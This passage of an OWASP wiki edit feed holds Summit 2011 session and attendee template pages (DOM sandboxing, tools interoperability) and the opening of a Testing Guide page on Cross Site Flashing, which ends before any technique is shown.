| summit_session_leader_name3 =&lt;br /&gt;
| summit_session_leader_email3 = &lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
| operational_leader_name1 = John Wilander&lt;br /&gt;
| operational_leader_email1 = john.wilander@owasp.org&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
| meeting_notes = &lt;br /&gt;
|-&lt;br /&gt;
| session_name_mask = &amp;lt;!--Please replace DO NOT EDIT this string --&amp;gt; Session002&lt;br /&gt;
| session_home_page = &amp;lt;!--Please replace DO NOT EDIT this string --&amp;gt; Summit_2011_Working_Sessions/Session002&lt;br /&gt;
}}&lt;br /&gt;
&amp;lt;/includeonly&amp;gt;&lt;/div&gt;</summary>
		<author><name>Wisec</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Summit_2011_Working_Sessions/Session001&amp;diff=101831</id>
		<title>Summit 2011 Working Sessions/Session001</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Summit_2011_Working_Sessions/Session001&amp;diff=101831"/>
				<updated>2011-01-25T09:44:29Z</updated>
		
		<summary type="html">&lt;p&gt;Wisec: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:&amp;lt;includeonly&amp;gt;{{{1}}}&amp;lt;/includeonly&amp;gt;&amp;lt;noinclude&amp;gt;Summit 2011 Working Sessions test tab&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name1 = Email John Wilander if you are unable to edit the Wiki and would like to sign up!&lt;br /&gt;
| summit_session_attendee_email1 = john.wilander@owasp.org&lt;br /&gt;
| summit_session_attendee_company1=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed1=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name2 = Michael Coates&lt;br /&gt;
| summit_session_attendee_email2 = &lt;br /&gt;
| summit_session_attendee_company2=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed2=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name3 = Colin Watson&lt;br /&gt;
| summit_session_attendee_email3 = &lt;br /&gt;
| summit_session_attendee_company3=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed3=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name4 = Stefano Di Paola&lt;br /&gt;
| summit_session_attendee_email4 = &lt;br /&gt;
| summit_session_attendee_company4=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed4=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name5 = &lt;br /&gt;
| summit_session_attendee_email5 = &lt;br /&gt;
| summit_session_attendee_company5=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed5=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name6 = &lt;br /&gt;
| summit_session_attendee_email6 = &lt;br /&gt;
| summit_session_attendee_company6=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed6=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name7 = &lt;br /&gt;
| summit_session_attendee_email7 = &lt;br /&gt;
| summit_session_attendee_company7=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed7=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name8 = &lt;br /&gt;
| summit_session_attendee_email8 = &lt;br /&gt;
| summit_session_attendee_company8=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed8=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name9 = &lt;br /&gt;
| summit_session_attendee_email9 = &lt;br /&gt;
| summit_session_attendee_company9=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed9=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name10 = &lt;br /&gt;
| summit_session_attendee_email10 = &lt;br /&gt;
| summit_session_attendee_company10=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed10=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name11 = &lt;br /&gt;
| summit_session_attendee_email11 = &lt;br /&gt;
| summit_session_attendee_company11=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed11=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name12 = &lt;br /&gt;
| summit_session_attendee_email12 = &lt;br /&gt;
| summit_session_attendee_company12=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed12=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name13 = &lt;br /&gt;
| summit_session_attendee_email13 = &lt;br /&gt;
| summit_session_attendee_company13=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed13=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name14 = &lt;br /&gt;
| summit_session_attendee_email14 = &lt;br /&gt;
| summit_session_attendee_company14=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed14= &lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name15 = &lt;br /&gt;
| summit_session_attendee_email15 = &lt;br /&gt;
| summit_session_attendee_company15=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed15=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name16 = &lt;br /&gt;
| summit_session_attendee_email16 = &lt;br /&gt;
| summit_session_attendee_company16=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed16=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name17 = &lt;br /&gt;
| summit_session_attendee_email17 = &lt;br /&gt;
| summit_session_attendee_company17=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed17=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name18 = &lt;br /&gt;
| summit_session_attendee_email18 = &lt;br /&gt;
| summit_session_attendee_company18=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed18=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name19 = &lt;br /&gt;
| summit_session_attendee_email19 = &lt;br /&gt;
| summit_session_attendee_company19=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed19=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name20 = &lt;br /&gt;
| summit_session_attendee_email20 = &lt;br /&gt;
| summit_session_attendee_company20=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed20=&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
| summit_track_logo = [[Image:T._browser_security.jpg]]&lt;br /&gt;
| summit_ws_logo = [[Image:WS._browser_security.jpg]]&lt;br /&gt;
| summit_session_name = DOM Sandboxing&lt;br /&gt;
| summit_session_url = http://www.owasp.org/index.php/Summit_2011_Working_Sessions/Session001&lt;br /&gt;
| mailing_list = https://groups.google.com/group/owasp-summit-browsersec&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
| short_working_session_description= '''Virtualization and Sandboxing for Secure Multi-Domain Web Apps'''&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
| related_project_name1 = Browser Security Track - main page&lt;br /&gt;
| related_project_url_1 = http://www.owasp.org/index.php/Category:Summit_2011_Browser_Security_Track&lt;br /&gt;
&lt;br /&gt;
| related_project_name2 = Google Group for the Browser Security Track&lt;br /&gt;
| related_project_url_2 = https://groups.google.com/group/owasp-summit-browsersec&lt;br /&gt;
&lt;br /&gt;
| related_project_name3 = &lt;br /&gt;
| related_project_url_3 = &lt;br /&gt;
&lt;br /&gt;
| related_project_name4 = &lt;br /&gt;
| related_project_url_4 = &lt;br /&gt;
&lt;br /&gt;
| related_project_name5 = &lt;br /&gt;
| related_project_url_5 = &lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
| summit_session_objective_name1= '''Attenuated versions of existing apis to sandboxed code'''. &amp;lt;noinclude&amp;gt;How should browsers introduce new apis into the sandbox or allow the sandbox to provide attenuated versions of existing apis to sandboxed code? For example, lets say the sandbox wants to provide an attenuated &amp;quot;alert&amp;quot; function to sandboxed code which does something slightly different than the real &amp;quot;alert&amp;quot;. What kind of apis could the browser provide to safely allow such extensions/apis? Do these need to be standardized such that different sandbox vendors can interoperate.&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
&lt;br /&gt;
| summit_session_objective_name2 = '''Client side sandboxed apps maintaining state and authentication'''.&amp;lt;noinclude&amp;gt; For example if a user is created in a sandboxed app how is it determined what that user can do?&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
&lt;br /&gt;
| summit_session_objective_name3 = '''Create a standard for modifying a sandboxed environment'''&lt;br /&gt;
&lt;br /&gt;
| summit_session_objective_name4 = '''Deprecate and discourage standards''' which ambiently or undeniably pass credentials. &lt;br /&gt;
&lt;br /&gt;
| summit_session_objective_name5 =   '''Create a standard for authentication within a sandboxed environment''' (maybe interfacing with existing auth without passing creds like 0Auth works)&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
| working_session_date_and_time = Tuesday, 09 February &amp;lt;br&amp;gt; Time: TBA&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
| discussion_model = The working form will most probably be short presentations to frame the topic and then round table discussions. Depending on number of attendees we'll break into groups.&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
| operational_resources = Projector, whiteboards, markers, Internet connectivity, power&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
| working_session_additional_details = &amp;lt;br&amp;gt;&lt;br /&gt;
[[Image:JS_DOM_Box_Jasvir_Gaz.jpg]]&lt;br /&gt;
&lt;br /&gt;
===Co-chair Dr Jasvir Nagra===&lt;br /&gt;
Jasvir Nagra is a researcher and software engineer at Google. He is the designer of [http://code.google.com/p/google-caja/ Caja] - a secure subset of HTML, CSS and JavaScript; co-author of [http://www.amazon.com/Surreptitious-Software-Obfuscation-Watermarking-Tamperproofing/dp/0321549252 Surreptitious Software] - a book on obfuscation, software watermarking and tamper-proofing, contributer to [http://shindig.apache.org/ Shindig] - the reference implementation of OpenSocial.&lt;br /&gt;
&lt;br /&gt;
===Co-chair Gareth Heyes===&lt;br /&gt;
Gareth &amp;quot;Gaz&amp;quot; Heyes calls himself Chief Conspiracy theorist and is affiliated with Microsoft. He is the designer and developer behind [http://www.owasp.org/index.php/OWASP_JavaScript_Sandboxes#tab=JSReg JSReg] – a Javascript sandbox which converts code using regular expressions; [http://www.owasp.org/index.php/OWASP_JavaScript_Sandboxes#tab=HTMLReg HTMLReg] &amp;amp; [http://www.owasp.org/index.php/OWASP_JavaScript_Sandboxes#tab=CSSReg CSSReg] – converters of malicious HTML/CSS into a safe form of HTML. He is also one of the co-authors of [http://www.amazon.com/Web-Application-Obfuscation-WAFs-Evasion-Filters-alert/dp/1597496049 Web Application Obfuscation: '-/WAFs..Evasion..Filters//alert(/Obfuscation/)-'] – a book on how an attacker would bypass different types of security controls including IDS/IPS.&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
|summit_session_deliverable_name1 =  Browser Security Report&lt;br /&gt;
|summit_session_deliverable_url_1 = &lt;br /&gt;
&lt;br /&gt;
|summit_session_deliverable_name2 = Browser Security Priority List&lt;br /&gt;
|summit_session_deliverable_url_2 = &lt;br /&gt;
&lt;br /&gt;
|summit_session_deliverable_name3 = &lt;br /&gt;
|summit_session_deliverable_url_3 = &lt;br /&gt;
&lt;br /&gt;
|summit_session_deliverable_name4 = &lt;br /&gt;
|summit_session_deliverable_url_4 = &lt;br /&gt;
&lt;br /&gt;
|summit_session_deliverable_name5 = &lt;br /&gt;
|summit_session_deliverable_url_5 = &lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
| summit_session_leader_name1 = Dr. Jasvir Nagra&lt;br /&gt;
| summit_session_leader_email1 = &lt;br /&gt;
&lt;br /&gt;
| summit_session_leader_name2 = Gareth Heyes&lt;br /&gt;
| summit_session_leader_email2 = &lt;br /&gt;
&lt;br /&gt;
| summit_session_leader_name3 =&lt;br /&gt;
| summit_session_leader_email3 = &lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
| operational_leader_name1 = John Wilander&lt;br /&gt;
| operational_leader_email1 = john.wilander@owasp.org&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
| meeting_notes = &lt;br /&gt;
|-&lt;br /&gt;
| session_name_mask = &amp;lt;!--Please replace DO NOT EDIT this string --&amp;gt; Session001&lt;br /&gt;
| session_home_page = &amp;lt;!--Please replace DO NOT EDIT this string --&amp;gt; Summit_2011_Working_Sessions/Session001 &lt;br /&gt;
}}&lt;br /&gt;
&amp;lt;/includeonly&amp;gt;&lt;/div&gt;</summary>
		<author><name>Wisec</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Summit_2011_Working_Sessions/Session056&amp;diff=101830</id>
		<title>Summit 2011 Working Sessions/Session056</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Summit_2011_Working_Sessions/Session056&amp;diff=101830"/>
				<updated>2011-01-25T09:41:45Z</updated>
		
		<summary type="html">&lt;p&gt;Wisec: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:&amp;lt;includeonly&amp;gt;{{{1}}}&amp;lt;/includeonly&amp;gt;&amp;lt;noinclude&amp;gt;Summit 2011 Working Sessions test tab&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name1 = Stefano Di Paola&lt;br /&gt;
| summit_session_attendee_email1 = stefano@owasp.org&lt;br /&gt;
| summit_session_attendee_company1= Minded Security&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed1=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name2 = &lt;br /&gt;
| summit_session_attendee_email2 = &lt;br /&gt;
| summit_session_attendee_company2=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed2=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name3 = &lt;br /&gt;
| summit_session_attendee_email3 = &lt;br /&gt;
| summit_session_attendee_company3=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed3=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name4 = &lt;br /&gt;
| summit_session_attendee_email4 = &lt;br /&gt;
| summit_session_attendee_company4=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed4=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name5 = &lt;br /&gt;
| summit_session_attendee_email5 = &lt;br /&gt;
| summit_session_attendee_company5=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed5=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name6 = &lt;br /&gt;
| summit_session_attendee_email6 = &lt;br /&gt;
| summit_session_attendee_company6=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed6=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name7 = &lt;br /&gt;
| summit_session_attendee_email7 = &lt;br /&gt;
| summit_session_attendee_company7=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed7=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name8 = &lt;br /&gt;
| summit_session_attendee_email8 = &lt;br /&gt;
| summit_session_attendee_company8=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed8=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name9 = &lt;br /&gt;
| summit_session_attendee_email9 = &lt;br /&gt;
| summit_session_attendee_company9=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed9=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name10 = &lt;br /&gt;
| summit_session_attendee_email10 = &lt;br /&gt;
| summit_session_attendee_company10=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed10=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name11 = &lt;br /&gt;
| summit_session_attendee_email11 = &lt;br /&gt;
| summit_session_attendee_company11=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed11=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name12 = &lt;br /&gt;
| summit_session_attendee_email12 = &lt;br /&gt;
| summit_session_attendee_company12=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed12=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name13 = &lt;br /&gt;
| summit_session_attendee_email13 = &lt;br /&gt;
| summit_session_attendee_company13=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed13=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name14 = &lt;br /&gt;
| summit_session_attendee_email14 = &lt;br /&gt;
| summit_session_attendee_company14=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed14= &lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name15 = &lt;br /&gt;
| summit_session_attendee_email15 = &lt;br /&gt;
| summit_session_attendee_company15=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed15=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name16 = &lt;br /&gt;
| summit_session_attendee_email16 = &lt;br /&gt;
| summit_session_attendee_company16=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed16=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name17 = &lt;br /&gt;
| summit_session_attendee_email17 = &lt;br /&gt;
| summit_session_attendee_company17=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed17=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name18 = &lt;br /&gt;
| summit_session_attendee_email18 = &lt;br /&gt;
| summit_session_attendee_company18=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed18=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name19 = &lt;br /&gt;
| summit_session_attendee_email19 = &lt;br /&gt;
| summit_session_attendee_company19=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed19=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name20 = &lt;br /&gt;
| summit_session_attendee_email20 = &lt;br /&gt;
| summit_session_attendee_company20=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed20=&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
| summit_track_logo = [[Image:T._metrics.jpg]]&lt;br /&gt;
| summit_ws_logo = [[Image:WS._metrics.jpg]]&lt;br /&gt;
| summit_session_name = Tools Interoperability (Data Instrumentation)&lt;br /&gt;
| summit_session_url = http://www.owasp.org/index.php/Summit_2011_Working_Sessions/Session056&lt;br /&gt;
| mailing_list =&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
| short_working_session_description=&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
| related_project_name1 = &lt;br /&gt;
| related_project_url_1 = &lt;br /&gt;
&lt;br /&gt;
| related_project_name2 = &lt;br /&gt;
| related_project_url_2 = &lt;br /&gt;
&lt;br /&gt;
| related_project_name3 = &lt;br /&gt;
| related_project_url_3 = &lt;br /&gt;
&lt;br /&gt;
| related_project_name4 = &lt;br /&gt;
| related_project_url_4 = &lt;br /&gt;
&lt;br /&gt;
| related_project_name5 = &lt;br /&gt;
| related_project_url_5 = &lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
| summit_session_objective_name1= &lt;br /&gt;
&lt;br /&gt;
| summit_session_objective_name2 = &lt;br /&gt;
&lt;br /&gt;
| summit_session_objective_name3 = &lt;br /&gt;
&lt;br /&gt;
| summit_session_objective_name4 = &lt;br /&gt;
&lt;br /&gt;
| summit_session_objective_name5 =  &lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
| working_session_date_and_time = &lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
| discussion_model = participants and attendees&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
| operational_resources = Projector, whiteboards, markers, Internet connectivity, power&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
| working_session_additional_details = &lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
|summit_session_deliverable_name1 = &lt;br /&gt;
A standard schema for describing application security risks of all types, with a place for all relevant information – whether derived statically, dynamically, manually, or architecturally.&lt;br /&gt;
|summit_session_deliverable_url_1 = http://www.owasp.org/index.php/Summit_2011_Working_Sessions/Session056/Deliverable_1&lt;br /&gt;
&lt;br /&gt;
|summit_session_deliverable_name2 = &lt;br /&gt;
|summit_session_deliverable_url_2 = &lt;br /&gt;
&lt;br /&gt;
|summit_session_deliverable_name3 = &lt;br /&gt;
|summit_session_deliverable_url_3 = &lt;br /&gt;
&lt;br /&gt;
|summit_session_deliverable_name4 = &lt;br /&gt;
|summit_session_deliverable_url_4 = &lt;br /&gt;
&lt;br /&gt;
|summit_session_deliverable_name5 = &lt;br /&gt;
|summit_session_deliverable_url_5 = &lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
| summit_session_leader_name1 = Dinis Cruz&lt;br /&gt;
| summit_session_leader_email1 = dinis.cruz@owasp.org&lt;br /&gt;
&lt;br /&gt;
| summit_session_leader_name2 = &lt;br /&gt;
| summit_session_leader_email2 = &lt;br /&gt;
&lt;br /&gt;
| summit_session_leader_name3 = &lt;br /&gt;
| summit_session_leader_email3 = &lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
| operational_leader_name1 =&lt;br /&gt;
| operational_leader_email1 =&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
| meeting_notes = &lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
| session_name_mask = &amp;lt;!--Please replace DO NOT EDIT this string --&amp;gt; Session056&lt;br /&gt;
| session_home_page = &amp;lt;!--Please replace DO NOT EDIT this string --&amp;gt; Summit_2011_Working_Sessions/Session056&lt;br /&gt;
}}&lt;/div&gt;</summary>
		<author><name>Wisec</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Summit_2011_Attendee/Attendee075&amp;diff=98483</id>
		<title>Summit 2011 Attendee/Attendee075</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Summit_2011_Attendee/Attendee075&amp;diff=98483"/>
				<updated>2011-01-06T09:30:51Z</updated>
		
		<summary type="html">&lt;p&gt;Wisec: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:&amp;lt;includeonly&amp;gt;{{{1}}}&amp;lt;/includeonly&amp;gt;&amp;lt;noinclude&amp;gt;OWASP 2011 Global Summit Attendee Tab&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| summit_attendee_name1 = Stefano Di Paola&lt;br /&gt;
| summit_attendee_email1 = stefano@owasp.org&lt;br /&gt;
| summit_attendee_wiki_username1 = Wisec&lt;br /&gt;
|-&lt;br /&gt;
| summit_attendee_company = Minded Security&lt;br /&gt;
|-&lt;br /&gt;
| Project Leadership (less than 6 months old) = &lt;br /&gt;
| Project Leadership (more than 6 months old) =  SWFIntruder, Former Flash Security Project &lt;br /&gt;
| Release Leadership (less than 6 months old) = &lt;br /&gt;
| Release Leadership (more than 6 months old) = SWFIntruder&lt;br /&gt;
| Project Contribution  (less than 6 months old) = &lt;br /&gt;
| Project Contribution  (more than 6 months old) = OWASP Testing Guide&lt;br /&gt;
| Release Contribution (less than 6 months old) =  &lt;br /&gt;
| Release Contribution (more than 6 months old) = &lt;br /&gt;
| Committee Membership = &lt;br /&gt;
| Chapter Co-Leadership = &lt;br /&gt;
| Conference Co-Leadership =  &lt;br /&gt;
|-&lt;br /&gt;
| summit_attendee_current_owasp_involvement_name1 = &lt;br /&gt;
| summit_attendee_current_owasp_involvement_url_1 = &lt;br /&gt;
| summit_attendee_current_owasp_involvement_name2 = &lt;br /&gt;
| summit_attendee_current_owasp_involvement_url_2 = &lt;br /&gt;
| summit_attendee_current_owasp_involvement_name3 = &lt;br /&gt;
| summit_attendee_current_owasp_involvement_url_3 = &lt;br /&gt;
| summit_attendee_current_owasp_involvement_name4 = &lt;br /&gt;
| summit_attendee_current_owasp_involvement_url_4 = &lt;br /&gt;
| summit_attendee_current_owasp_involvement_name5 = &lt;br /&gt;
| summit_attendee_current_owasp_involvement_url_5 = &lt;br /&gt;
|-&lt;br /&gt;
| summit_attendee_reason_for_summit_participation_name1 = XSS Sessions&lt;br /&gt;
| summit_attendee_reason_for_summit_participation_url_1 = &lt;br /&gt;
| notes_reason_for_participating_issues_to_be_discussed_1 = &lt;br /&gt;
| summit_attendee_reason_for_summit_participation_name2 = Browser Security Sessions&lt;br /&gt;
| summit_attendee_reason_for_summit_participation_url_2 = &lt;br /&gt;
| notes_reason_for_participating_issues_to_be_discussed_2 = &lt;br /&gt;
| summit_attendee_reason_for_summit_participation_name3 = &lt;br /&gt;
| summit_attendee_reason_for_summit_participation_url_3 = &lt;br /&gt;
| notes_reason_for_participating_issues_to_be_discussed_3 = &lt;br /&gt;
| summit_attendee_reason_for_summit_participation_name4 = &lt;br /&gt;
| summit_attendee_reason_for_summit_participation_url_4 = &lt;br /&gt;
| notes_reason_for_participating_issues_to_be_discussed_4 = &lt;br /&gt;
| summit_attendee_reason_for_summit_participation_name5 = &lt;br /&gt;
| summit_attendee_reason_for_summit_participation_url_5 = &lt;br /&gt;
| notes_reason_for_participating_issues_to_be_discussed_5 = &lt;br /&gt;
|-&lt;br /&gt;
| summit_attendee_owasp_sponsor = &lt;br /&gt;
|-&lt;br /&gt;
| summit_attendee_summit_time_paid_by_name1 =&lt;br /&gt;
| summit_attendee_summit_time_paid_by_url_1 =&lt;br /&gt;
| summit_attendee_summit_time_paid_by_name2 =&lt;br /&gt;
| summit_attendee_summit_time_paid_by_url_2 =&lt;br /&gt;
|-&lt;br /&gt;
| summit_attendee_summit_expenses_paid_by_name1 = &lt;br /&gt;
| summit_attendee_summit_expenses_paid_by_url_1 = &lt;br /&gt;
| summit_attendee_summit_expenses_paid_by_name2 = &lt;br /&gt;
| summit_attendee_summit_expenses_paid_by_url_2 =  &lt;br /&gt;
|-&lt;br /&gt;
| reason_for_sponsorship = Active Member, Owasp Testing Guide Contributor, SWFIntruder Lead, browser security contribution&lt;br /&gt;
|-&lt;br /&gt;
| status = &lt;br /&gt;
|-&lt;br /&gt;
| letter sent to sponsor = &lt;br /&gt;
|-&lt;br /&gt;
| notes for Kate =&lt;br /&gt;
|-&lt;br /&gt;
| attendee_name_mask = &amp;lt;!--Please replace DO NOT EDIT this string --&amp;gt; Attendee075&lt;br /&gt;
| attendee_home_page = &amp;lt;!--Please replace DO NOT EDIT this string --&amp;gt; Summit_2011_Attendee/Attendee075 &lt;br /&gt;
}}&lt;/div&gt;</summary>
		<author><name>Wisec</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Testing_for_Cross_site_flashing_(OTG-CLIENT-008)&amp;diff=38855</id>
		<title>Testing for Cross site flashing (OTG-CLIENT-008)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Testing_for_Cross_site_flashing_(OTG-CLIENT-008)&amp;diff=38855"/>
				<updated>2008-09-08T13:10:18Z</updated>
		
		<summary type="html">&lt;p&gt;Wisec: /* Cross Site Flashing */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:OWASP Testing Guide v3}}&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
ActionScript is the language, based on ECMAScript, used by Flash application when dealing with&lt;br /&gt;
interactive needs. &lt;br /&gt;
ActionScript, like every other language, has some implementation pattern which could lead to &lt;br /&gt;
security issues.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
In particular, since Flash application are often embedded in browsers, vulnerabilities like DOM based Cross Site Scripting could be present in flawed Flash applications.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Description of the Issue == &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Since the first publication of &amp;quot;Testing Flash Applications&amp;quot; [1], new versions of Flash player &lt;br /&gt;
were released in order to mitigate some of the attacks which will be described.&lt;br /&gt;
Nevertheless some issue still remains exploitable because it strongly depends on developer unsecure&lt;br /&gt;
programming practices.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Gray Box testing and example ==&lt;br /&gt;
&lt;br /&gt;
=== Decompilation ===&lt;br /&gt;
&lt;br /&gt;
Since SWF files are interpreted by a virtual machine embedded in the player itself, &lt;br /&gt;
